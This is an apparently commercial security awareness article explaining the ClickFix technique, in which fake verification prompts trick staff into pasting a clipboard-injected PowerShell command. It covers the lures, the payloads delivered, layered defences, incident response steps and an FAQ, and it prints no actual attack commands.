Picture this. One of your team members is working on a deadline, they open a document link someone sent them, or visit a website they've been to before an then a message appears - looks like a Cloudflare security check, or a browser error, or a verification prompt they've seen dozens of times. It tells them there's a quick fix needed to view the content properly.
The instructions are simple. Press Windows + R. Paste the code that's appeared in their clipboard. Press Enter.
Your network has just been compromised - by your own staff member, using your own operating system's built-in tools, in a way that most security software never sees coming.
That's ClickFix and in 2025, Microsoft identified it as the single most common initial access method used by attackers globally - responsible for 47% of all observed attacks. It surged 517% in the first half of 2025 alone. It's being used by organised crime, ransomware groups, and nation-state actors from Russia, North Korea, and Iran.
Most New Zealand business owners have never heard of it.
ClickFix is a social engineering technique. Not a piece of malware itself - a delivery method. A way of tricking a human being into doing the attacker's work for them, using tools their own computer already trusts.
The genius of it, from an attacker's perspective, is elegance. Traditional malware delivery requires convincing someone to open a malicious attachment, download a suspicious file, or click a link that triggers an exploit. Security tools are built to detect those patterns. Filters scan attachments, endpoint protection watches for malicious downloads and email security flags suspicious links.
ClickFix sidesteps all of it - because the person doesn't download anything. They don't open a malicious file. They simply follow what looks like a legitimate technical instruction, and in doing so, execute a malicious command using a Windows tool their computer has always trusted.
There's no malicious file for antivirus to detect. No suspicious download for email filters to flag. No unusual process spawned by an untrusted application for EDR to catch. From the perspective of most security tools, a user opened PowerShell and ran a command. That happens every day in legitimate IT operations. The security software has no way to know this particular command was placed in the user's clipboard by a criminal.
The attack is fileless. It runs in memory and it leaves minimal forensic evidence. By the time anyone realises what happened, the attacker may have been in the environment for days.
The mechanics are straightforward once you understand them - which is part of what makes this such an important thing to teach your team. Knowing what to look for is the most effective defence.
Step 1: The lure.
The user lands on a webpage showing what appears to be a legitimate prompt. The most common disguises are:
A fake Cloudflare verification page - the standard "checking your browser" interstitial millions of websites use. Attackers clone these precisely. The fake version looks identical to the real thing.
A fake CAPTCHA - styled to look like Google reCAPTCHA or a similar human verification tool. Again, pixel-perfect replicas. Users complete these without thinking.
A fake browser error - "Your browser is missing a required extension" or "This document couldn't load. Follow these steps to fix it."
A fake Microsoft Teams or Office prompt - "Your session has expired. Verify your identity to continue."
All of these are designed to feel like routine technical friction - the kind of minor interruption that people resolve on autopilot dozens of times a week.
Step 2: The clipboard injection.
While the user is reading the prompt and deciding to comply, JavaScript running in the background of the webpage silently copies a malicious PowerShell command into the user's clipboard. They don't see this happen. There's no notification. Their clipboard now contains a command that will, when executed, download and run malware on their device.
Step 3: The instruction.
The prompt tells the user what to do. Press Windows + R to open the Run dialogue. Press Ctrl + V to paste. Press Enter to run.
Or: Open PowerShell. Paste. Press Enter.
Or, in newer variants: navigate to a specific folder in File Explorer, paste the content into the address bar, press Enter.
The instructions look like legitimate troubleshooting steps. The kind of thing an IT support person might tell you over the phone. The kind of thing that appears in "how to fix this error" tutorials online.
Step 4: Execution.
The user follows the instructions. The PowerShell command runs. It connects to an attacker-controlled server and downloads the actual payload - ransomware, an information stealer, a remote access trojan, or a post-exploitation framework that gives the attacker full control of the device.
The whole sequence takes under thirty seconds. The user has no idea anything is wrong. They typically assume the fix worked, because the error message disappears and the page either loads or redirects somewhere benign.
This is the part that makes ClickFix genuinely dangerous - and why the 47% figure from Microsoft's 2025 Digital Defense Report is so significant.
Most endpoint security tools, email filters, and even EDR solutions are designed around a model of malicious input entering a system. A malicious file arrives, a malicious link redirects to a malicious download and an exploit triggers unexpected process behaviour. The security tool detects the malicious thing and blocks it.
ClickFix removes the malicious thing entirely.
From your security software's perspective, here's what it sees: a user opened the Run dialogue (normal). They pasted something and pressed Enter (normal). PowerShell launched (normal). PowerShell connected to an external server (normal - PowerShell does this constantly in legitimate IT operations). A command executed in memory (normal).
No malicious file was written to disk. No suspicious process was spawned by an untrusted parent. No known-bad hash was detected. No signature matched. The Bitdefender analysis of ClickFix attacks noted precisely this: "From the EDR's perspective, this looks like a normal user launching powershell.exe from explorer.exe, not a malicious process spawned by an untrusted application."
The attack succeeds because it exploits trust - the user's trust in what looks like a legitimate prompt, and the security tool's trust in what looks like legitimate user behaviour.
This is what makes awareness training the non-negotiable first line of defence against ClickFix. There is no purely technical control that reliably stops a user from willingly executing a command. You can make it harder. You can reduce the blast radius when it happens. But the most effective prevention is a staff member who recognises the pattern and stops before they type.
The payload delivered through a successful ClickFix attack depends on who's running the campaign - and the list of who's using this technique is alarming.
Ransomware groups have adopted ClickFix as a primary initial access method. NCC Group's December 2025 analysis identified it as the second most common attack method behind only phishing, used by multiple active ransomware operations.
Information stealers - particularly Lumma Stealer - are frequently delivered via ClickFix. These tools extract credentials, session tokens, browser-saved passwords, cryptocurrency wallets, and corporate authentication data from infected devices. Your staff member's credentials for every system they've accessed get harvested silently and sold.
Remote Access Trojans - AsyncRAT and NetSupport RAT have been heavily distributed through ClickFix campaigns. These give attackers persistent, real-time access to the infected device - they can see the screen, execute commands, access files, and move through your network while your staff member is using the computer normally.
Post-exploitation frameworks - Havoc C2 was deployed via ClickFix through Microsoft SharePoint in March 2025. These frameworks are what sophisticated attackers use after initial access to map the environment, escalate privileges, and set up for the final-stage attack.
Nation-state malware - Proofpoint's April 2025 report "Around the World in 90 Days" documented state-sponsored actors from North Korea (Kimsuky), Iran (MuddyWater), and Russia (APT28) all using ClickFix in active campaigns. The technique isn't just for financially motivated criminals. It's good enough for geopolitical espionage.
ClickFix isn't confined to obscure corners of the internet. It's been found on:
Compromised legitimate websites - A site your team visits regularly gets quietly infected by attackers. The ClickFix prompt appears the next time someone visits - on a page they've trusted for years. This is particularly insidious because the URL is correct, the site is real, and the only thing that's changed is a malicious script running in the background.
Fake versions of commonly used tools - DocuSign, Microsoft Teams, Zoom, Google Meet, and PDF viewers have all been cloned by ClickFix campaigns. Your team receives what looks like a legitimate link to a shared document or a meeting invitation. The page looks exactly right. The ClickFix prompt appears when they try to open the content.
Malicious ads on legitimate sites - Malvertising campaigns have used ClickFix prompts appearing through ad networks on otherwise legitimate sites - news sites, business tools, industry publications.
Phishing emails with ClickFix redirects - A phishing email links to a fake landing page that immediately presents the ClickFix prompt. This combines the social engineering of phishing with the technical bypass of ClickFix.
Google and Bing search results - Attackers have used SEO poisoning to rank malicious pages highly for common business software searches - "download Adobe Reader," "Microsoft Teams update," "DocuSign login." Users searching for legitimate software land on convincing fake pages with ClickFix prompts.
New Zealand businesses face this threat in the same way they face every global cybersecurity threat - with less dedicated security resource than larger markets, fewer staff trained to recognise emerging attack techniques, and the persistent assumption that local businesses aren't interesting enough to be targeted at scale.
ClickFix undermines all of that because it's automated and indiscriminate. Attackers don't hand-select NZ businesses to target with ClickFix campaigns. They compromise websites, buy ad placements, send bulk phishing emails, and poison search results - and New Zealand users encounter these just as frequently as anyone else in the world.
The NCSC's 2025 Cyber Threat Report was explicit: New Zealand organisations make the mistake of assuming they are not big enough, wealthy enough, or critical enough to be a target. ClickFix campaigns don't require a specific target. They require a user who follows a prompt, and those exist in every organisation in the country.
The sectors most frequently hit by ClickFix campaigns globally - finance, legal, professional services, technology, manufacturing, and healthcare - are the same sectors that dominate New Zealand's SME landscape and the same sectors NSP works with every day.
The defences against ClickFix work at multiple layers. No single control stops everything - but the combination significantly reduces both the likelihood of a successful attack and the damage when one gets through.
This is the most important control. Your staff need to know this technique exists, what it looks like, and what the right response is.
No legitimate website, application, or IT tool will ever ask you to open the Run dialogue, open PowerShell, or paste commands from your clipboard. Ever. If a prompt is asking you to do any of those things, stop. Do not comply. Report it to IT immediately.
That message needs to be taught explicitly - because ClickFix looks nothing like the phishing emails most security awareness training focuses on. It doesn't ask for credentials. It doesn't have a suspicious link. It presents as a technical fix, and many technically confident staff members are more likely to comply, not less, because they think they understand what's happening.
Security awareness training that includes simulated ClickFix scenarios - not just phishing simulations - is the updated standard for 2026. If your current training programme doesn't address this technique, it has a gap.
In most business environments, standard users don't need unrestricted access to PowerShell. Configuring PowerShell execution policies to restrict what can run, and by whom, significantly reduces the damage ClickFix can do even when a staff member follows the prompt.
This isn't a complete solution - attackers adapt, and there are ClickFix variants that use File Explorer's address bar or other mechanisms rather than PowerShell directly. But it raises the barrier meaningfully and forces attackers to use more detectable methods.
Preventing unapproved applications and scripts from executing on endpoints - particularly scripts arriving from clipboard paste into the Run dialogue - is a technical control that can stop ClickFix payloads from running even when a user follows the prompt.
Microsoft's Windows Defender Application Control and similar tools can be configured to block execution of unsigned or unknown scripts. This is more complex to implement than simply enabling a setting, but for organisations with sensitive data or high-value transactions, it's worth the investment.
Even when ClickFix succeeds in getting initial code executed, the subsequent behaviour - connecting to command-and-control servers, downloading payloads, lateral movement - generates detectable signals. Managed Detection and Response that monitors your environment around the clock catches these post-execution indicators far earlier than any approach that relies on periodic review.
The manufacturing firm that suffered 47 days of undetected access didn't have continuous monitoring. Organisations with active MDR capability typically find these indicators within hours of initial execution - dramatically reducing the dwell time and the damage.
Blocking access to known malicious domains - including the command-and-control infrastructure that ClickFix payloads connect to - prevents the second stage of the attack even if the initial execution succeeds. DNS filtering services that use threat intelligence feeds can block these connections in real time, containing the damage from a successful ClickFix execution before the attacker establishes full access.
While standard EDR struggles to detect ClickFix at the execution stage, well-configured EDR with specific behavioural detection rules can catch the patterns that follow. The Huntress research on ClickFix identified specific chokepoints: RunMRU activity, Windows Terminal spawning PowerShell from unusual contexts, and clipboard-to-terminal execution patterns. EDR that's configured with these rules - not just out-of-the-box defaults - adds a meaningful detection layer.
If a staff member reports following a prompt of this kind, or if your monitoring alerts on suspicious PowerShell activity, the response is the same as any suspected breach:
Isolate the affected device from the network immediately - disconnect from Wi-Fi, unplug from ethernet. Do not turn it off. Contact your IT provider or security team immediately. This is not a situation to investigate slowly while the device remains connected.
Change credentials for any accounts the affected user was logged into on that device - email, cloud applications, VPN, remote access tools. From a different, unaffected device.
Assume the worst and investigate: treat the event as a confirmed breach until forensic investigation proves otherwise. The cost of treating a false alarm seriously is minimal. The cost of treating a real compromise casually is not.
Report to the NCSC at ncsc.govt.nz. Their incident response team can provide advice and their data helps protect other NZ organisations from the same campaigns.
Is ClickFix new?
The technique was first documented by Proofpoint in early 2024, in a report titled "From Clipboard to Compromise: A PowerShell Self-Pwn." It gained rapid adoption through late 2024 and exploded in 2025 - growing 517% in the first half of the year. By the end of 2025, Microsoft had identified it as the single most common initial access method globally. It's new enough that most security awareness training programmes haven't been updated to address it.
Can Macs be affected, not just Windows?
Yes. While the original ClickFix variants were Windows-focused - using the Win+R Run dialogue - later variants have been developed for macOS. Microsoft's analysis of ClickFix campaigns found that the clipboard command copied to the user's device differs between Windows and macOS, with macOS variants using Terminal commands rather than PowerShell. No platform is immune.
Our staff are technically savvy - are we still at risk?
Potentially more so. ClickFix prompts are designed to look like legitimate technical troubleshooting. Staff who are comfortable with technology and have some familiarity with PowerShell or command-line tools are arguably more likely to comply - because they think they understand what they're doing. The Director of Operations who triggered the 47-day breach wasn't a naïve user. They were an experienced executive who followed what looked like a routine technical prompt.
Will our antivirus catch this?
Unlikely at the point of execution. ClickFix works precisely because it uses legitimate system tools in ways that antivirus signature-based detection doesn't flag. The payload delivered after execution may be detected if it writes known malware to disk - but many ClickFix payloads are fileless and run in memory, bypassing disk-based scanning. Post-execution behaviour monitoring, as provided by MDR, is more reliable than antivirus for this threat.
What does a legitimate website prompt actually look like vs a ClickFix prompt?
No legitimate website, application, or service will ever ask you to open the Windows Run dialogue, open PowerShell, open a command prompt, or paste anything from your clipboard into a terminal or address bar as part of a verification or error-fix process. Cloudflare's real verification system works entirely within the browser - no user action beyond clicking a checkbox is required. Google reCAPTCHA works the same way. If a prompt is asking for Run, PowerShell, or clipboard paste - it is not legitimate.
Is this the same as phishing?
ClickFix is a social engineering technique like phishing, but the mechanism is different. Phishing tries to capture credentials or deliver a malicious payload through a link or attachment. ClickFix doesn't ask for credentials and doesn't require the user to open a file - it tricks the user into executing a command themselves using their own system's tools. This makes it harder to detect technically and requires different awareness training to address.
What sectors are being targeted most heavily?
Unit 42's 2025 research identified ClickFix campaigns across technology, financial services, manufacturing, wholesale and retail, government, professional and legal services, utilities, and energy. The Singapore Cyber Security Agency's 2025 advisory specifically flagged the hospitality sector as an active target. In practice, ClickFix campaigns are broad-spectrum - the technique works across sectors and the attackers using it aren't particularly selective.
Most businesses find out they weren't when it's too late.
We'll look at your current security awareness training, your endpoint configuration, and your monitoring capability - and tell you honestly whether your team would recognise a ClickFix prompt before they acted on it.
Or call us directly: 0508 010 101